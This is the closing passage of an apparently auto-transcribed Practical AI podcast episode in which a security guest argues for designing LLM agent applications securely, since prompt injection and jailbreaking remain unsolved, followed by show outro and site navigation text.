for the application. But thenthere is a lot of built in
attack modules that do the heavylifting for you.

Chris (50:51):
That sounds really cool. I'm looking forward to trying it
out myself. You really have meintrigued about it. As we are
winding up here, one of thethings that we like to to to try
to get a sense of on finishingis kind of where things are
going. And, you know, you youwere in this really cutting edge

(51:11):
aspect, you know, the themerging of security and AI and
and all of the new types ofrisks that people face out
there.
And you guys have made so muchprogress over the last, you
know, year or two. I I'mwondering, as you're looking
ahead at at this at both kind ofwhat you're doing at your
organization and also, like, thelarger industry since you're

(51:35):
participating in all of thesedifferent touch points, you
know, going to differentconferences and stuff like that.
Where where do you see thisgoing? What kind of evolution
are you expecting going forward?And as part of that, what do you
want to see?
Like, aside from whether or notyou're seeing an example, when
you're, like, at the end of theday, you're not you know, you're

(51:56):
able just to kinda ponder andmaybe have a glass of wine or
whatever you do at night. Like,what is the thing you're like,
that's the thing that it wouldbe cool. I wanna go do that. You
know, whether or not it's on theplan right now or just an idea.
Wax poetic for me a little biton this because I'm kinda
curious where this industrymight be going.

Donato (52:14):
Oh, I I I wish I knew, to be honest. I I think so,
realistically, what I would liketo see is people shifting the
cybersecurity mindset from let'sdo LLM red teaming to let's
secure LLM applications and usecases using a design pattern

(52:39):
that actually makes sense. Solet's stop asking LLMs to say
that humanity is stupid or howto make a bomb, and let's start
looking at our applications andensuring that they can be used
in a safe way if they haveaccess to tools and stuff like
that. Because I think that'sgoing to be one of the big

(53:01):
issues that we're going to have.Like, if people don't start
seriously taking the risks thatcome from LLM agents, we are
going to see real world bigbreaches coming from that.
So what I would like to see isshifting that discussion from
LLM red teaming to system designthat takes into account the fact

(53:25):
that we don't know how to solveprompt injection and
jailbreaking in LLMS. Whensomebody figures it out, I will
be the happiest person in theworld. But I believe Samultmann
last year said they would havesolved hallucinations, and I am
not going to continue.

Chris (53:42):
Right. That's a good way to end right there. Donato,
thank you so much for coming onPractical AI. A really
fascinating conversation. I amexcited about this and hope you
come back again.
I know I know we've already hada couple of conversations, but
they're always fun. As you're asnew things are happening for

(54:03):
you. Don't don't hesitate to letus know what's going on and keep
us apprised on what the spacelooks like.

Donato (54:09):
Thank you very much for having me.

Jerod (54:18):
All right, that's our show for this week. If you
haven't checked out our website,head to practicalai.fm, and be
sure to connect with us onLinkedIn, X, or Blue Sky. You'll
see us posting insights relatedto the latest AI developments,
and we would love for you tojoin the conversation. Thanks to
our partner, Prediction Guard,for providing operational
support for the show. Check themout at predictionguard.com.

(54:41):
Also, thanks to BreakmasterCylinder for the beats and to
you for listening. That's allfor now, but you'll hear from us
again next week.

All Episodes

Episode Transcript

Popular Podcasts

Stuff You Should Know

Las Culturistas with Matt Rogers and Bowen Yang

Dateline NBC

.css-15opob5{left:0;position:absolute;top:0.8rem;} All Episodes

.css-14f5ked{margin:0;word-break:break-word;display:-webkit-box;-webkit-box-orient:vertical;box-orient:vertical;-webkit-line-clamp:2;overflow:hidden;}Dealing with increasingly complicated agents

Episode Transcript

Popular Podcasts

.css-r6mb8g{margin:0;word-break:break-word;display:-webkit-box;-webkit-box-orient:vertical;box-orient:vertical;-webkit-line-clamp:1;overflow:hidden;}Stuff You Should Know

Las Culturistas with Matt Rogers and Bowen Yang

Dateline NBC

All Episodes

Dealing with increasingly complicated agents

Stuff You Should Know